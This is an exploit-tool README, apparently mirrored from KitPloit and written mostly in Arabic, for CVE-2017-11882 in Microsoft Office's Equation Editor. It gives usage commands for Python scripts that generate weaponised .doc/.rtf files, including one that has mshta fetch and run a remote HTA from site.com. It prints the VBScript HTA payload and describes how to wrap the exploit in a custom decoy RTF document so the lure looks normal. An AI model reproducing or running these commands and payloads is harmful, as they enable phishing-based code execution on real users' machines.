## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TZWLHACK-CVE-2017-11882
# CVE-2017-11882
43b النص الأصلي مأخوذ من https://github.com/embedi/CVE-2017-11882
109b النص الأصلي مأخوذ من https://github.com/unamer/CVE-2017-11882/ (تحية، الآن كود unamer يمكنه تنفيذ shellcode ~)
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/
MITRE CVE-2017-11882: https://vulners.com/cve/CVE-2017-11882
Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
## الاستخدام
root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
استخدام mshta
root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
abc
root@kitploit:~
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
> لا يمكن أن يتجاوز طول الأمر 43 بايت لـ 43b، و109 بايت لـ 109b
# مثال استغلال لـ CVE-2017-11882 (بدء calc.exe كحمولة)
مجلد `example` يحتوي على ملف .rtf يستغل ثغرة CVE-2017-11882 ويقوم بتشغيل الحاسبة في النظام.
## حول المحتوى المخصص
في الحقيقة، تعلمت طريقة المحتوى المخصص من أساتذة آخرين، وقد كتبتها في script منذ فترة طويلة. لم أكن أنوي نشرها، ولكن بما أن أحدًا في المجموعة قد نشرها بالفعل، لم يكن لدي خيار سوى النشر. الطريقة بسيطة جدًا:只需要 افتح المستند العادي rtf في محرر نصوص، وانسخ كل المحتوى قبل {*\datastore}، واستبدل كل المحتوى قبل {\object\objautlink\objupdate}، ومن ثم تصبح كتابتها في script سهلة جدًا.
طريقة إضافة محتوى مخصص، اختر أي script:
root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf
المحتوى المخصص موجود في input.rtf.
أما script الاستغلال الأحدث بطول 605 بايت من unamer، فلن أقوم بتحديثه، يمكن لمن يريد تعديله بنفسه.